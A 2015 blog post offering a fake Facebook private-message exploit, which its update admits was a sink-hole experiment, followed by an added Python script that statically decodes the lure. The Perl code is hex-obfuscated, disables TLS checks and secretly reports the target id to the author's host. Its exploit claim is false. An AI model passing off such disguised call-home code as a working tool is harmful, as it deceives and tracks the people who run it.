UPDATE 10/04/2015

This was just a small sink-hole experiment – sorry, no 0day here 😦

The results are out, check them here: https://phl4nk.wordpress.com/2015/05/10/facepwn-part-2-the-results/

****************************

So after tampering around on the mobile site of Facebook (https://m.facebook.com), I came up with a very interesting and unique way to retrieve private messages from any user on Facebook!

Simply supply the victim's Facebook id (navigate to their profile and grab it from the URL https://www.facebook.com/their.facebook.id123) to the script, and let the wizardry do its thing.

Example output:

    ./facepwn.pl their.facebook.id123
    [+] Building sploit
    [+] Attacking their.facebook.id123
    [+] Success! Dumping data:
    <[[ [User_id]:98372299836
    dGhpcyBpcyBhIHByaXZhdGUgbWVzc2FnZSE=
    ...[snip]...

Grab the source below and have a play. Please be responsible, and always know what you’re doing 😉

    #!/usr/bin/perl
    #usage: facepwn.pl [target]
    use warnings;
    use strict;
    use WWW::Mechanize;

    # build the 0day exploit containing target name/facebook_ID
    # returns network stack to 'probe' the backend mobile listener
    # when listener is probed, data is leaked
    # may require a flux capacitor
    sub build_sploit{
        my $target=shift;
        #build payload
        print "[+] Building sploit\n\n";
        my $OO0O0O="\x57\x57\x57\x3a\x3a\x4d\x65\x63\x68\x61\x6e\x69\x7a\x65";
        my @OOO0=("\x66\x61\x6b\x65\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x73\x74\x61\x63\x6b\x20\x6c\x6f\x6c");
        my $OO="\x53\x53\x4c\x5f\x76\x65\x72\x69\x66\x79\x5f\x6d\x6f\x64\x65";
        my $OOOO00="\x76\x65\x72\x69\x66\x79\x5f\x68\x6f\x73\x74\x6e\x61\x6d\x65";
        #initiate network stack
        my $OOO0O=$OO0O0O->new(ssl_opts=>{$OO=>0,$OOOO00=>0});
        my $OO00O="\x4c\x6f\x6f\x6b\x73\x20\x6c\x69\x6b\x65\x20\x79\x6f\x75\x20\x64\x65\x2d\x6f\x62\x66\x75\x73\x63\x61\x74\x65\x64\x20\x74\x68\x65\x20\x63\x6f\x64\x65\x2e\x2e\x2e";
        my $OO0="\x54\x68\x69\x73\x20\x69\x73\x20\x61\x20\x73\x69\x6d\x70\x6c\x65\x20\x65\x78\x70\x65\x72\x69\x6d\x65\x6e\x74\x20\x74\x6f\x20\x73\x65\x65\x20\x68\x6f\x77\x20\x6d\x61\x6e\x79\x20\x70\x65\x6f\x70\x6c\x65\x20\x72\x75\x6e\x20\x74\x68\x69\x73\x20\x63\x6f\x64\x65\x20\x62\x6c\x69\x6e\x64\x6c\x79";
        my $OO0O="\x62\x6c\x6f\x67\x20\x70\x6f\x73\x74\x20\x72\x65\x76\x65\x61\x6c\x69\x6e\x67\x20\x74\x68\x65\x20\x64\x61\x74\x61\x20\x77\x69\x6c\x6c\x20\x62\x65\x20\x70\x75\x62\x6c\x69\x73\x68\x65\x64\x20\x73\x6f\x6f\x6e\x2e\x2e\x2e\x73\x74\x61\x79\x20\x74\x75\x6e\x65\x64";
        my $OO000="\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x68\x6c\x34\x6e\x6b\x2e\x63\x6f\x2e\x76\x75\x2f\x69\x5f\x72\x75\x6e\x5f\x6f\x62\x66\x75\x73\x63\x61\x74\x65\x64\x5f\x63\x6f\x64\x65\x3f$target";
        $OOO0O->get($OO000);
        #build network stack
        push @0000,$OO00O;
        #push target ID onto stack
        push @0000,$target;
        push @0000,$OO0;
        push @0000,$OO0O;
        return @0000;
    }

    #build sploit from target {user_input}
    my @payloads=build_sploit($ARGV[0]);

    #iterate through the stack and fire payloads:
    foreach(@payloads){
        my $attack=WWW::Mechanize->new();
        print "[+] Attacking $ARGV[0]...\n\n";
        if(my $attack="x73\x3a\x2f\x2f" eq $_ ? 1 : 0){
            my $messages=$attack->get("https://m.facebook.com/m/01/messages/$_");
            print "[+] Success! Dumping data:\n\n";
            print $messages;
        }else{
            print "[!] Something went wrong, modify the payload.\n\n";
            exit 1;
        }
    }
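
For anyone handed a script like this, a static triage pass shows what it does before it is ever run. The following is an added example, not the author's code: it decodes the `\xNN` string literals, inlines them where the variables are used, and reports disabled TLS verification and outbound requests. The sample lines are copied from the script above; the function names and rule labels are this example's own.

```python
import re

# Lines copied from the script above; nothing here is executed as Perl.
SAMPLE = r'''
my $OO0O0O="\x57\x57\x57\x3a\x3a\x4d\x65\x63\x68\x61\x6e\x69\x7a\x65";
my $OO="\x53\x53\x4c\x5f\x76\x65\x72\x69\x66\x79\x5f\x6d\x6f\x64\x65";
my $OOOO00="\x76\x65\x72\x69\x66\x79\x5f\x68\x6f\x73\x74\x6e\x61\x6d\x65";
my $OOO0O=$OO0O0O->new(ssl_opts=>{$OO=>0,$OOOO00=>0});
my $OO000="\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x68\x6c\x34\x6e\x6b\x2e\x63\x6f\x2e\x76\x75\x2f\x69\x5f\x72\x75\x6e\x5f\x6f\x62\x66\x75\x73\x63\x61\x74\x65\x64\x5f\x63\x6f\x64\x65\x3f$target";
$OOO0O->get($OO000);
'''

HEX = re.compile(r'\\x([0-9a-fA-F]{2})')
ASSIGN = re.compile(r'my\s+(\$\w+)\s*=\s*"((?:[^"\\]|\\.)*)"\s*;')

def decode_hex(text):
    """Turn \\xNN escapes into characters without evaluating any code."""
    return HEX.sub(lambda m: chr(int(m.group(1), 16)), text)

def decode_assignments(src):
    """Map each variable assigned a string literal to its decoded value."""
    return {name: decode_hex(lit) for name, lit in ASSIGN.findall(src)}

def resolve(src):
    """Decode literals, then inline them where the variables are used."""
    table = decode_assignments(src)
    names = sorted(table, key=len, reverse=True)
    out = []
    for line in decode_hex(src).splitlines():
        if not ASSIGN.search(line):  # leave the declarations themselves alone
            for n in names:
                # (?!\w) keeps $OO from matching inside $OOO0O
                line = re.sub(re.escape(n) + r'(?!\w)',
                              lambda m, n=n: '"%s"' % table[n], line)
        out.append(line)
    return "\n".join(out)

RULES = {
    "tls_verification_disabled":
        re.compile(r'"(?:SSL_verify_mode|verify_hostname)"\s*=>\s*0'),
    "http_request_to": re.compile(r'->get\("(https?://[^"]+)"\)'),
}

def triage(src):
    """Return {rule label: [matched text]} for the resolved source."""
    text = resolve(src)
    return {label: [m.group(m.lastindex or 0) for m in rx.finditer(text)]
            for label, rx in RULES.items()}

if __name__ == "__main__":
    print(resolve(SAMPLE))
    print(triage(SAMPLE))
```

Run against the sample, the resolved source shows the HTTP client being constructed with both TLS checks set to 0 and a single request carrying the supplied target id in its query string.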